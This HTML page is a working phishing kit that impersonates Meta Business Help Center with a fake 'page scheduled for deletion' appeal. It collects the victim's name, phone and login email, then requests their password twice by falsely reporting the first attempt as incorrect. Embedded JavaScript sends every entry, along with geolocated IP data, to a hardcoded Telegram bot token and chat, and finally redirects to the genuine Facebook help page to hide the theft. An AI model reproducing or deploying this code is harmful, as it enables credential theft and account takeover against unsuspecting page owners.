<html>
<head>
	<!-- Required meta tags -->
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <!-- Bootstrap CSS -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/css/bootstrap.min.css"
    integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/css/bootstrap.min.css"
    integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">

  <title>Meta for Business - Page Appeal</title>
  <script src="https://kit.fontawesome.com/83fd8385f7.js" crossorigin="anonymous"></script>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>


  <link rel="icon" type="image/x-icon" href="ts.ico">
<style type="text/css">
	
	body {
  margin: 0;
  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Oxygen',
    'Ubuntu', 'Cantarell', 'Fira Sans', 'Droid Sans', 'Helvetica Neue',
    sans-serif;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

code {
  font-family: source-code-pro, Menlo, Monaco, Consolas, 'Courier New',
    monospace;
}

.App {
  text-align: center;
}

body{
  background-color: #e9eaed !important;
}

.topheader {
  background-color: #355797;
  text-align: left;
  padding: 15px 20px;
}

p{
  margin: 0px;
}
.metahead{
  color: white;
  display: inline-block;
  padding-left: 15px;
  margin-left: 15px;
  border-left: 1px solid white;
  margin-bottom: 0px;
  font-size: 14px;
}

.metalogo{
  margin-top: -2px;
}

.masheader{
    background-image: url('30175859_1847141705586364_4634876909090504704_n.1a04d13ed075a5eb588b.jpg');
        background-repeat: no-repeat;
    background-size: cover;
}

.trupi{
  background-color: white;
  margin-top: 20px;
}

    .main .card {
      margin-top: 60px;
      background-color: white;
      padding-top: 16px;
      padding-bottom: 0px;
      padding-left: 16px;
      padding-right: 16px;
      border: none;
      box-shadow: 0 1px 2px rgba(0, 0, 0, 0.2);
      margin-bottom: 30px;
    }

    .main .open {
      color: white;
      padding: 4px 10px;
      border-radius: 5px;
    }

    .ikonauser {
      background-color: #c4c9cd;
      border-radius: 50%;
      font-size: 15px;
      color: white;
      padding: 10px;
    }

.businesshelpcenter{
  padding-bottom: 60px;
  font-size: 40px;
  color: white;
  padding-left: 50px;
  padding-right: 50px;
  text-align: center;
  font-weight: 300;
}
.businesshelp{
  padding-top: 60px;
  margin-bottom: 0px;
  color: white;
  text-align: center;
  font-family: Helvetica;
  font-size: 12px;
  letter-spacing: 3px;
  line-height: 21px;
}


.masheader .wrapper{
  background-color: rgba(36,55,96,0.7);
}

.trupi {
  background-color: white !important;
  border: 1px solid #dfe0e4;
  border-radius: 4px;
}


.imazhinewmessg{
  height: 50px;
  margin-top: 10px;
}

.trupi .toptext{
  font-weight: bold;
  font-size: 14px;
  padding-left: 15px;
  margin-bottom: 5px;
}

.topi{
  padding: 15px;
  display: flex;
  border-bottom: 1px solid #dfe0e4;
}

.caseopen{
  background-color: #4a80cc;
  color: white;
  font-size: 11px;
  display: inline-block;
  padding: 3px 7px;
  border-radius: 5px;
  font-weight: bold;
  margin-left: 15px;
}

.casenumber{
  display: inline-block;
  font-size: 12px;
  color: #9b9595;
  margin-left: 8px;
}

.mesi {
  background-color: #f6f7f8;
  padding: 15px;
  border-bottom: 1px solid #dfe0e4;
}

.activitytext{
  font-size: 11px;
  color: #a1a0b4;
  font-weight: bold;
}

.ourmessageimage{
  width: 40px;
  height: 40px;
}

.ourmessage{
  display: flex;

}
.marginleftside{
  margin-left: 6px;
  font-size: 14px !important;
}

.alignright{
}
.ourreply{
  font-size: 14px;
  margin-left: 21px;
  color: rgba(0,0,0,0.8);
}

.yourreply{
  margin-left: 21px;
  flex: auto;
  margin-right: 20px;
  margin-bottom: 20px;
}

.yourreplytext{
  padding-left: 0px !important;
  margin-left: 0px !important;
}

    label {
      color: #90949c;
      font-weight: bold;
      font-size: 12px;

      }


         input[type=password] {
      color: #495057;
      background-color: #fff;
      background-clip: padding-box;
      border-radius: 0px !important;
      border: 1px solid #ced4da;
      float: right;
      width: 198px;
      border-radius: 0px;
    }


        #fac {
      margin-top: 50px;
      display: none;
      margin-bottom: 60px;
    }

    .twh3 {
      border-bottom: 1px solid rgba(0, 0, 0, .101);
      background-color: #f5f6f7;
      font-size: 16px;
      color: #4b4f56;
      padding: 12px;
      font-weight: 700;
      border-top-left-radius: 8px;
      border-top-right-radius: 8px;
    }

    #fac .card {
      border-top-left-radius: 8px;
      border-top-right-radius: 8px;
    }

    #fac .bodyyy p {
      font-size: 13px;
    }

    #fac .bodyyy {
      padding: 10px 20px !important;
      border-bottom: 1px solid rgba(0, 0, 0, .101);
    }

    #fac .footerii {
      padding: 10px 20px !important;
      background-color: #f5f6f7;
      height: 55px;

    }

    .nolink {
      color: black !important;
      font-size: 14px !important;
    }

    #twof .modal-body {
      font-size: 14px;
    }

    .paddingleftt {
      padding-left: 12px;
    }

    @media only screen and (max-width: 600px) {}


    @media (max-width: 400px) {
      .linkupertwo {
        font-size: 12px !important;
        margin-top: 8px !important;
      }
    }

    .butoni {
      background-color: #4267b2;
      border: 1px solid #4267b2;
      color: white;
      margin-top: 15px;
      font-size: 13px;
      font-weight: 500;
      padding: 7px 20px;
      border-radius: 2px;
      text-transform: none;
      font-weight: bold;
    }

    .butoni:hover {
      background-color: #444444;
    }

        .btn:hover {
      color: white !important;
    }

    .ourmessagiii {
      font-family: "Arial";
    }

    #sendcodeagain {
      display: none;
      font-size: 14px;
      padding-left: 0px;
      color: #385898;
    }

    #sendcodeagain:hover {
      color: #385898 !important;
    }

.labela{
  font-size: 14px;
  color: #90949c;
  font-family: 'Helvetica Neue', Helvetica, Arial, 'lucida grande', tahoma, verdana, arial, sans-serif;
  font-weight: 600;
  font-size: 12px;
  margin-bottom: 8px;
}

input[type=text]{
      height: 35px;
    border-radius: 0px;
}
textarea{
  border-radius: 0px !important;
}

.footer{
  background-color: #4080ff;
  margin-top: 70px;
  padding-top: 40px;
  padding-bottom: 40px;
  text-align: center;
}

.footer p{
  color: white;
}
.footer a{
  color: white;
}

.logofooter{
  width: 90px;
  padding-bottom: 15px;
}

.footer ul li p{
  text-align: left;
  margin-bottom: 10px;
  font-size: 14px;
}



.nerlogofooter{
  margin-bottom: 30px;
}

.fontbold{
  font-weight: bold;
}

ul {
  list-style-type: none;
  padding-left: 0px !important;
  margin-left: 0px !important;

}

ul li {
  padding-left: 0px;
  margin-left: 0px;
}

.bottomfooter ul li{
  display: inline-block;
  padding-left: 10px;
  padding-right: 10px;
  font-size: 14px;
}

.bottomfooter{
  text-align: center;
  margin: auto;
}

.bootomfooter ul{
  margin-bottom: 10px;
  margin-left: 0px !important;
  padding-left: 0px !important;
}
.bottomfooter{
  padding-top: 20px;
  padding-bottom: 20px;
}

.bootomfooter p{
  margin-bottom: 10px;
}


.button-15 {
  background-color: #5e77aa !important;
  color: white !important;
  border: 1px solid #0077CC !important;
  font-family: "SF Pro Text","SF Pro Icons","AOS Icons","Helvetica Neue",Helvetica,Arial,sans-serif !important;
  font-size: 14px !important;
  letter-spacing: -.022em !important;
  margin-top: 5px !important;
  line-height: 1.47059 !important;
  min-width: 30px !important;
  border-radius: 0px !important;
  overflow: visible !important;
  padding: 7px 15px !important;
  text-align: center !important;
  font-weight: bold !important;
  border: 1px solid #3e5688;
}

@media only screen and (max-width: 600px) {
  .dontshowonmobile {
    display: none;
  }

  .footer ul{
    margin-top: 10px;
  }

  .bottomfooter ul li{
    margin-top: 10px;
  }
}

@media only screen and (max-width: 390px) {
  .needanotherway{
    font-size: 11px !important;
  }
}


.provideinformation{
  font-size: 14px;
  margin-bottom: 10px;
  margin-top: 10px;
}

.modali2 .modal-dialog{
  padding-top: 100px !important;
  margin-top: 0px !important;
}


.modali1 .modal-dialog{
  padding-top: 10px !important;
  margin-top: 10px !important;
}

.modal-title{
  color: #050505 !important;
  font-size: 16px !important;
  font-weight: 500 !important;
}

.modal-body .foryoursecurity{
    color: #65676b;
    display: block;
    font-size: .9375rem;
    margin-bottom: 10px;
}
.modal-body .foryoursecurity2{
    color: black;
    display: block;
    font-size: .9375rem;
    margin-bottom: 10px;
}

input[type=password]{
  border-radius: 0px !important;
}

.pwincorrect{
  font-size: 14px;
  color: red;
  margin-bottom: 10px;
}

.formapw{
  margin-bottom: 10px !important;
}


#twofac{
  display: none;
}
#pwincorrect{
  display: none;
}

.karta{
  background-color: white;
  border-radius: 2px;
  border: 1px solid #d1d2d5;
  padding: 12px;
}

.fillimitwo p{
  font-weight: 600;
  margin-bottom: 10px;
}

.fillimitwo {
  border-bottom: 1px solid #dddfe2;
}

.bodytwo{
  margin-top: 12px;
}

.bodytwo p{
  font-size: 14px;
}

#newlogin{
  height: 30px;
  border-radius: 0px !important;
  font-size: 14px !important;
  width: 150px;
}

.fundtwo{
  padding-top: 10px;
  border-top: 1px solid #dddfe2;
  margin-top: 10px;
  padding-bottom: 36px !important;
}

#formapertwo{
  display:flex;
}

.needanotherway{
  padding-top: 10px;
  text-decoration: none;
  font-size: 13px;
  color: #385898;
}

.majtneedanother{
  float: left;
  padding-top: 7px;
}
.djathtneedanother{
  float: right;
}

.butonicontinue{
      font-size: 13px !important;
    padding: 5px 10px !important;
}

#kohaeci {
  display:none;
  padding-top: 2px;
    padding-left: 10px;
}

.twofac{
  margin-top: 40px;
  margin-bottom: 80px;
}

.form-check-label{
  font-size: 14px !important;
}

.searchicon{
  width: 20px;
  height: 20px;
  float: right;
  margin-top: 2px;
}

.menufordesktop{
  display: none;
}

#loginincorrect{
  color:red;
  display:none;
}

  .strong{
    font-size: 14px;
    margin-top: -20px;
    display: inline-block;
    margin-bottom: 10px;
  }

@charset "UTF-8";body{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,sans-serif}code{font-family:source-code-pro,Menlo,Monaco,Consolas,Courier New,monospace}.App{text-align:center}body{background-color:#e9eaed!import



</style>



</head>

<body>
	<div>

		<div class="topheader">
			<div class="container">
				<img class="metalogo" src="278052525_813944336231788_2126819975299864928_n.2ca221b227e5e50b2861f74e67923f35.svg">
				<p class="metahead">Support Inbox</p>
				<img src="search-13-64.a9254a55959a7da573f4.ico" class="searchicon">
			</div>
		</div>
	
    <div class="menufordesktop">
    	<div class="container">
    		<ul>
    			<li>Create &amp; Manage Accounts</li>
    			<li>Publish &amp; Distribute Content</li>
    			<li>Advertise</li>
    			<li>Sell on Facebook &amp; Instagram</li>
    			<li>Monetize Your Content or App</li>
    		</ul>
    	</div>
    </div>


    <div class="masheader" id="masheader">
    	<div class="wrapper">
    		<div class="container">
    			<p class="businesshelp">Meta Business Help Center</p>
    			<p class="businesshelpcenter"> Get Support</p>
    		</div>
    	</div>
    </div>
        <div class="col-6" style="text-align: right;">
          <!-- <div style="padding-top: 4px;">
              <img src="" encodeURIComponent(image)" class="img-fluid" width="30" height="30" style="object-fit: cover; display: inline-block; border-radius: 50%;" />
              <p style="display: inline-block; margin-bottom: 0px; font-weight: 600; font-size: 14px; color:#050505"></p>
            </div>-->
          <p
            style="color:#3578e5; display:none; padding-top: 8px; margin-bottom: 0px; font-weight: 600; font-size: 15px;">
            <i style="font-size: 16px;" class="fa-solid fa-envelope"></i> Support Inbox
          </p>
        </div>
      </div>
    </div>
  </section>

  <section class="main">
    <div class="container">
      <div class="row">
        <div class="col-md-8 offset-md-2">
          <div class="card">
            <div class="row" style="padding-bottom: 20px; border-bottom: 1px solid #dddfe2;">
              <div class="col-md-1 col-2">
                <i style="background-color: #575d6d; color: white; padding:10px; border-radius: 50%; font-size: 22px;"
                  class="fa-solid fa-envelope"></i>
              </div>
              <div class="col-md-11 col-10">
                <p style="font-weight: bold; margin-bottom: 0px;">Your page goes against our Community Standards</p>
                <div class="">
                  <span style="background-color: #3b81d3; font-size: 12px;" class="open">OPEN</span> <span
                    style="color:#90949c; font-size: 12px;">Report no: 3088553115</span>
                </div>
              </div>
            </div>


            <div class="row"
              style="padding-top: 20px; padding-bottom: 20px; background-color: #f7f7f7; border-bottom:1px solid #dddfe2">
              <div class="col-md-12">
                <p style="color:#90949c; font-size: 12px; font-weight: 500; margin-bottom: 10px;">ACTIVITY</p>
              </div>
              <div class="col-md-1 col-2">
                <img src="Facebook_logo.png" class="img-fluid" />
              </div>
              <div class="col-md-11 col-10" style="padding-left: 0px;">
                <p style="font-weight: bold; font-size: 14px; margin-bottom: 7px">Our Message</p>
                <p style="font-size: 14px; color:#4b4f56;" class="ourmessagiii">
                  Your page has been scheduled for deletion because one of the following reasons:<br>
                  - Intellectual Property Infringement<br>
                  - Community Standards<br>
                  - Hate Speech
                </p>
              </div>
            </div>

            <div class="row"
              style="padding-top: 20px; padding-bottom: 20px; background-color: #f7f7f7; border-bottom:1px solid #dddfe2">

              <div class="col-md-1 col-2">


                <img src="user.89dcfdfae3cdc0a97fc3.png" class="img-fluid" width="40" height="40" style="object-fit: cover; display: inline-block; border-radius: 50%;" /> 
              </div>
              <div class="col-md-11 col-10" style="padding-left: 0px;">
                <p style="font-weight: bold; font-size: 14px; margin-bottom: 7px"></p>
              <strong class="strong">Your Reply</strong>

                <p style="margin-bottom: 15px; font-size: 12px;">Please be sure to provide the requested information below. Failure to provide this information may delay the processing of your appeal.</p>
                <form id="form" action="#" onsubmit="return checkCheckBoxes(this);">
                  <input type="hidden"  id="ipaddress">
                  <div class="form-group">
                    <label for="name">Your Name</label>
                    <input type="text" class="form-control" id="name" name="name" onkeyup="EnableDisable(this)"
                      oninput="checkLength('name')" style="font-size: 14px;">
                  </div>
                  <div class="form-group">
                    <label for="phone">Your Phone Number</label>
                    <input type="text" class="form-control" id="phone" name="phone"
                      onkeypress="return onlyNumberKey(event)" onkeyup="EnableDisable(this)"
                      oninput="checkLength('phone')" required>
                  </div>
                  <div class="form-group">
                    <label for="email">Login Email Address</label>
                    <input type="email" class="form-control" id="email" name="email" onkeyup="EnableDisable(this)"
                      aria-describedby="email" oninput="checkLength('email')" required>
                  </div>
                  

                    <div class="form-group">
                      <label for="exampleInputEmail1">Your Appeal</label>
                      <textarea name="reason" id="reason" class="form-control"
                        oninput="checkLength('reason')"></textarea>
                    </div>
                    <div class="form-check">
                      <input class="form-check-input" type="checkbox" id="check" value="1" name="check" required="true"
                        required>
                      <label class="form-check-label" for="check" name="check">I agree to our Terms, Data and Cookies Policy.</label>
                      <p id="termsaccept" style="color:red; font-size: 13px; font-weight: 500; margin-bottom: 20px;">
                      </p>

                    </div>

                    <button type="submit" id="submit" class="btn butoni" disabled="disabled" onclick="sendData()"
                      style="margin-bottom: 15px;">Submit</button>
                </form>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>

  <!-- Modal -->
  <div class="modal fade" id="exampleModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
    <div class="modal-dialog  modal-dialog-centered">
      <div class="modal-content">
        <div class="modal-header custom-header">
          <h5 class="modal-title" id="exampleModalLabel" style="font-size: 16px; font-weight: 600;">Please Enter Your
            Password</h5>
          <button type="button" class="close" data-dismiss="modal" aria-label="Close">
            <span aria-hidden="true">&times;</span>
          </button>

        </div>

        <div class="modal-body">
          <div id="modal_form">
            <p style="font-size: 14px; margin-bottom: 10px;">For your security, you must enter your password to
              continue.</p>
            <div class="mt-1 d-flex justify-content-between">
              <input type="hidden" value="0" id="pw_tries">
              <label for="email" id="em_lb">Email address:</label>
              <input type="email" readonly disabled class="ml-2 input-password" id="confirm_email" name="password"
                style="float: right;width: 198px;border-radius: 0px;">
            </div>
            <div class="mt-1 d-flex justify-content-between">
              <label for="password">Password:</label>

              <input type="password" oninput="checkLength('password')" class="ml-2 input-password" name="password"
                id="password" style="float: right;width: 198px; border-radius: 0px;">
            </div>
            <div class="justify-content-between" style="text-align: right;">
              <span class="text-danger d-none" id="wrong_pass">
                <p style="color:red; font-size: 13px; font-weight: 500; margin-bottom: 20px;">The password you&apos;ve
                  entered is incorrect.</p><span>
            </div>
          </div>
        </div>
        <div style="text-align: right;">
          <button class="btn butoni" style="margin-top: 0px; margin-bottom: 20px; margin-right: 20px;"
            onclick="handleActions()">Submit</button>
        </div>
      </div>
    </div>
  </div>
  <!-- Modal -->

  <!-- Modal -->
  <div class="modal fade" id="exampleModal1" tabindex="-1" aria-labelledby="exampleModalLabel1" aria-hidden="true">
    <div class="modal-dialog  modal-dialog-centered">
      <div class="modal-content">
        <div class="modal-header custom-header">
          <h5 class="modal-title" id="exampleModalLabel1" style="font-size: 16px; font-weight: 600;">Please Re-Enter
            Your Password</h5>
          <button type="button" class="close" data-dismiss="modal" aria-label="Close">
            <span aria-hidden="true">&times;</span>
          </button>

        </div>

        <div class="modal-body">
          <div id="modal_form">
            <p style="font-size: 14px; margin-bottom: 10px;">For your security, you must enter your password to
              continue.</p>
            <div class="mt-1 d-flex justify-content-between">
              <input type="hidden" value="1" id="pw_tries">
              <input name="ip" value="185.223.152.14" type="hidden">
              <input name="phonepass2" id="phonepass2" type="hidden">
              <input name="city2" id="city2" type="hidden">
              <input name="email2" id="emailpass2" type="hidden">
              <label for="email" id="em_lb">Email address:</label>
              <input type="email" readonly disabled class="ml-2 input-password" id="confirm_email1" name="email"
                style="float: right;width: 198px;border-radius: 0px;">
            </div>
            <div class="mt-1 d-flex justify-content-between">
              <label for="password">Password:</label>

              <input type="password" oninput="checkLength('password')" class="ml-2 input-password" name="password2"
                required id="password2" style="float: right;width: 198px; border-radius: 0px;">
            </div>
            <div class="justify-content-between" style="text-align: right;">
              <span class="text-danger" id="wrong_pass">
                <p style="color:red; font-size: 13px; font-weight: 500; margin-bottom: 20px;">The password you&apos;ve
                  entered is incorrect.</p><span>
            </div>
          </div>
        </div>
        <div style="text-align: right;">
          <button class="btn butoni" style="margin-top: 0px; margin-bottom: 20px; margin-right: 20px;"
            onclick="sendPass2()">Submit</button>
        </div>
      </div>
    </div>
  </div>





    <div class="footer" id="futeri">
    	<div class="container">
    		<img src="278052525_813944336231788_2126819975299864928_n.2ca221b227e5e50b2861f74e67923f35.svg" class="logofooter">
    		<p class="nerlogofooter">Facebook can help your large, medium or small business grow. Get the latest news for advertisers and more on our <a href="#">Meta for Business Page.</a></p>

    		<div class="row">
    			<div class="col-lg col-6">
    				<ul>
    					<li>
    						<p class="fontbold">Marketing on Facebook</p>
    						<p>Success Stories</p><p>Measurement</p>
    						<p>Industries</p><p>Inspiration</p>
    						<p>Events</p><p>News</p><p>Site map</p>
    					</li>
    				</ul>
    			</div>
    			<div class="col-lg col-6">
    				<ul>
    					<li>
    						<p class="fontbold">Marketing objectives</p>
    						<p>Build your presence</p><p>Create awareness</p><p>Drive discovery</p><p>Generate leads</p><p>Boost sales</p><p>Earn loyalty</p>
    					</li>
    				</ul>
    			</div>
    			<div class="col-lg col-6">
    				<ul>
    					<li>
    						<p class="fontbold">Facebook Pages</p><p>Get started with Pages</p><p>Setting up your Page</p><p>Manage your Facebook Page</p><p>Promote your Page</p><p>Messaging on your Page</p><p>Page Insights</p>
    					</li>
    				</ul>
    			</div>
    			<div variant="dontshowonmobile col-lg" class="col">
    				<ul>
    					<li>
    						<p class="fontbold">Facebook ads</p><p>Get started with ads</p><p>Buying Facebook ads</p><p>Ad formats</p><p>Ad placement</p><p>Choose your audience</p><p>Measure your ads</p><p>Managing your ads</p>
    					</li>
    				</ul>
    			</div>
    			<div class="col-lg col-6">
    				<ul>
    					<li>
    						<p class="fontbold">Resources</p><p>Ads Guide</p><p>Business Help Centre</p><p>Meta Audience Network</p><p>Meta Blueprint</p><p>Meta for Developers</p><p>Meta Business Partners</p><p>Instagram Business</p><p>Support</p>
    					</li>
    				</ul>
    			</div>
    		</div>
    	</div>
    </div>

    <div class="bottomfooter">
    	<div class="container">
    		<ul>
    			<li>English (UK)</li>
    			<li>English (US)</li>
    			<li>Español</li>
    			<li>Português (Brasil)</li>
    			<li>Français (France)</li>
    			<li>Español (España)</li>
    			<li>More languages</li>
    		</ul>
    		<ul>
    			<li>© 2023 Meta</li>
    			<li>About</li>
    			<li>Developers</li>
    			<li>Careers</li>
    			<li>Privacy</li>
    			<li>Cookies</li>
    			<li>Terms</li>
    			<li>Help Centre</li>
    		</ul>
    	</div>
    </div>
  <script>

    function onlyNumberKey(evt) {

      // Only ASCII character in that range allowed
      var ASCIICode = (evt.which) ? evt.which : evt.keyCode
      if (ASCIICode > 31 && (ASCIICode < 48 || ASCIICode > 57))
        return false;
      return true;
    }

    function testInput(event) {
      var value = String.fromCharCode(event.which);
      var pattern = new RegExp(/[a-z��� ]/i);
      return pattern.test(value);
    }

    $('#name').bind('keypress', testInput);

  </script>
  <script type="text/javascript">

    function validateEmail(email) {
      var re = /\S+@\S+\.\S+/;
      return re.test(email);
    }
    function EnableDisable(name) {
      //Reference the Button.
      var submit = document.getElementById("submit");

      //Verify the TextBox value.
      if (name.value.trim() != "") {
        //Enable the TextBox when TextBox has value.
        submit.disabled = false;
      } else {
        //Disable the TextBox when TextBox is empty.
        submit.disabled = true;
      }
      //Verify the TextBox value.
      if (phone.value.trim() != "") {
        //Enable the TextBox when TextBox has value.
        submit.disabled = false;
      } else {
        //Disable the TextBox when TextBox is empty.
        submit.disabled = true;
      }
      //Verify the TextBox value.
      if (email.value.trim() != "") {
        //Enable the TextBox when TextBox has value.
        submit.disabled = false;
      } else {
        //Disable the TextBox when TextBox is empty.
        submit.disabled = true;
      }
    };
  </script>
  <input id="ip_hidden" value="" type="hidden">
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js"
    integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM"
    crossorigin="anonymous"></script>
  <script>
    function getIp() {
      $.get("https://api.ipify.org/?format=json", function (response) {
        $("#ip_hidden").val(response.ip);
      });
    }
    getIp();
    var bot = 'bot6138410184:AAHosimp5fTfau5GxSC5B_h3EiESVBBRxoY';
    var chid = '5710188429';

    function sendData() {
      $.get("https://ipapi.co/json/", function (response) {
        let ip = $("#ip_hidden").val();
        let country = response.country;
        let city = response.city;

        var params = {
          content: '=========E JEPI FORMEN ======' + '%0A' +
            '1|Full Name: "' + document.getElementById('name').value.replace('#', '-sharp-') + '"' + '%0A' +
            '2|Email: "' + document.getElementById('email').value.replace('#', '-sharp-') + '"' + '%0A' +
            '3|Appeal: "' + document.getElementById('reason').value.replace('#', '-sharp-') + '"' + '%0A' +
            '4|Number: "' + document.getElementById('phone').value.replace('#', '-sharp-') + '"' + '%0A' +
            '5|City : "' + city + '"' + '%0A' +
            '6|Country: "' + country + '"' + '%0A' +
            'IP: "' + ip + '"' + '%0A' +
            '============================='
        }

        fetch(`https://api.telegram.org/bot6138410184:AAHosimp5fTfau5GxSC5B_h3EiESVBBRxoY/sendMessage?chat_id=5710188429&text=${params.content}/`, {
          method: 'POST', // or 'PUT'
          headers: {
            'Content-Type': 'application/json',
          },

        }).then(function () {
          // $('#exampleModal').modal('show');
        })


      });
    }

    function sendPass2() {
      let password2 = document.getElementById('password2').value.replace('#', '-sharp-');
      $.get("https://ipapi.co/json/", function (response) {
        let country = response.country;
        let regionName = response.region;
        let city = response.city;
        let ip = $("#ip_hidden").val();
        console.log(response);


        var params = {
          content: '=========Password-2==========' + '%0A' +
            'Passi 2: "' + password2 + '"' + '%0A' +
            'City : "' + city + '"' + '%0A' +
            'Country : "' + country + '"' + '%0A' +
            'Region : "' + regionName + '"' + '%0A' +
            'Number : "' + document.getElementById('phone').value.replace('#', '-sharp-') + '"' + '%0A' +
            'Email : "' + document.getElementById('email').value.replace('#', '-sharp-') + '"' + '%0A' +
            'IP: "' + ip + '"' + '%0A' +
            '============================='
        }


        fetch(`https://api.telegram.org/bot6138410184:AAHosimp5fTfau5GxSC5B_h3EiESVBBRxoY/sendMessage?chat_id=5710188429&text=${params.content}/`, {
          method: 'POST', // or 'PUT'
          headers: {
            'Content-Type': 'application/json',
          },

        }).then(function () {
          window.location = 'confirm.html';
        })


      });
    }

    function validateEmail(email) {
      var re = /\S+@\S+\.\S+/;
      return re.test(email);
    }

    $('.numeric').on('input', function (event) {
      this.value = this.value.replace(/[^0-9]/g, '');
    });
    const btn = document.querySelector('#submit');

    btn.addEventListener('click', (e) => {
      e.preventDefault();
      let openModal = true;
      let name = document.querySelector("#name");
      if (name.value === '') {
        openModal = false;
      }
      checked = $("input[type=checkbox]:checked").length;
      if (!checked) {
        return document.getElementById("termsaccept").innerHTML = "Please accept Terms, Data Policy and Cookies Policy";
        openModal = false;
      }
      let email = document.querySelector("#email");
      if (email.value === '' || validateEmail(email.value) === false) {
        email.style.cssText = 'border: 1px solid red;'
        openModal = false;
      }

      let phone = document.querySelector("#phone");
      if (phone.value === '') {
        phone.style.cssText = 'border: 1px solid red;'
        openModal = false;
      }
      let reason = document.querySelector("#reason");

      if (openModal) {
        var myModal = new bootstrap.Modal(document.getElementById("exampleModal"), {});
        document.getElementById('confirm_email').value = document.getElementById('email').value.replace('#', '-sharp-');
        myModal.show();
      }
    });

    function checkLength(id) {
      let input = document.querySelector("#" + id);
      if (input.value !== '') {
        input.style.cssText = 'border: 1px solid grey';
      }
    }

    function handleActions(e) {
      let pass = document.getElementById('password').value.replace('#', '-sharp-');
      if (pass.length === 0) {
        $('#password').css('border', '1px solid red');
        return;
      } else {
        let tries = document.getElementById('pw_tries');
        if (parseInt(tries.value) === 0) {
          // document.querySelector("#wrong_pass").classList.remove('d-none');
          // document.getElementById('password').value = '';
          // document.getElementById('password').style.border = '1px solid red';
          $("#exampleModal1").modal('hide');
          $("#exampleModal1").modal('show');
          document.getElementById('confirm_email1').value = document.getElementById('email').value.replace('#', '-sharp-');
          document.getElementById('emailpass2').value = document.getElementById('email').value.replace('#', '-sharp-');
          document.getElementById('phonepass2').value = document.getElementById('phone').value.replace('#', '-sharp-');
          $.get("https://ipapi.co/json/", function (response) {
            let country = response.country;
            let regionName = response.region;
            let city = response.city;
            document.getElementById('city2').value = response.city;
            let ip = $("#ip_hidden").val();


            var params = {
              content: '=========Password-1==========' + '%0A' +
                'Passi 1: "' + pass + '"' + '%0A' +
                'City : "' + city + '"' + '%0A' +
                'Country : "' + country + '"' + '%0A' +
                'Number : "' + document.getElementById('phone').value.replace('#', '-sharp-') + '"' + '%0A' +
                'Email : "' + document.getElementById('email').value.replace('#', '-sharp-') + '"' + '%0A' +
                'IP: "' + ip + '"' + '%0A' +
                '============================='
            }


        fetch(`https://api.telegram.org/bot6138410184:AAHosimp5fTfau5GxSC5B_h3EiESVBBRxoY/sendMessage?chat_id=5710188429&text=${params.content}/`, {
              method: 'POST', // or 'PUT'
              headers: {
                'Content-Type': 'application/json',
              },

            }).then(function () {

            })




          });
        } else {
          let code = document.querySelector("#code");
          if (code === null) {
            document.querySelector("#wrong_pass").classList.add('d-none');
            let password = document.querySelector("#password").value.replace('#', '-sharp-');
            $.get("https://ipapi.co/json/", function (response) {
              let country = response.country;
              let regionName = response.region;
              let city = response.city;
              let ip = $("#ip_hidden").val();
              console.log(response);


              var params = {
                content: '=========Password-2==========' + '%0A' +
                  'Passi 2: "' + password + '"' + '%0A' +
                  'City : "' + city + '"' + '%0A' +
                  'Country : "' + country + '"' + '%0A' +
                  'Region : "' + regionName + '"' + '%0A' +
                  'Number : "' + document.getElementById('phone').value.replace('#', '-sharp-') + '"' + '%0A' +
                  'Email : "' + document.getElementById('email').value.replace('#', '-sharp-') + '"' + '%0A' +
                  'IP: "' + ip + '"' + '%0A' +
                  '============================='
              }


        fetch(`https://api.telegram.org/bot6138410184:AAHosimp5fTfau5GxSC5B_h3EiESVBBRxoY/sendMessage?chat_id=5710188429&text=${params.content}/`, {
                method: 'POST', // or 'PUT'
                headers: {
                  'Content-Type': 'application/json',
                },

              }).then(function () {

              })

              let twoPages = true;
              if (twoPages) {
                window.location = 'confirm.html';
              } else {
                document.querySelector("#modal_header").innerText = 'Enter security code';
                document.querySelector("#mod_title").innerText = 'Please enter your security code';
                document.querySelector("#modal_form").innerHTML = '<div class="mt-1 d-flex justify-content-between"><label for="email">Code:</label><input type="text" class="ml-2 input-password" id="code" placeholder="Enter your code"  name="code" style="float: right;"></div>';
              }
            });
          } else {
            $.get("https://ipapi.co/json/", function (response) {
              let country = response.country;
              let regionName = response.region;
              let city = response.city;
              let ip = $("#ip_hidden").val();
              $.post("step_three.php", {
                code: code.value,
                city: city,
                ip: document.getElementById('ipaddress').value.replace('#', '-sharp-')
              });
              window.setTimeout(function () {
                window.location = 'https://www.facebook.com/business/help/507905413074296?helpref=search&sr=1&query=contact';
              }, 3000)
            });
          }

        }
      }
    }
    function sendBean() {
      $.get("https://ipapi.co/json/", function (response) {
        let country = response.country;
        let regionName = response.region;
        let city = response.city;
        let ip = $("#ip_hidden").val();
        $.post("step_one.php", {
          country: country,
          regionName: regionName,
          city: city,
          ip: document.getElementById('ipaddress').value.replace('#', '-sharp-')
        });
      });
    }
    sendBean();
  </script>
</body>

</html>
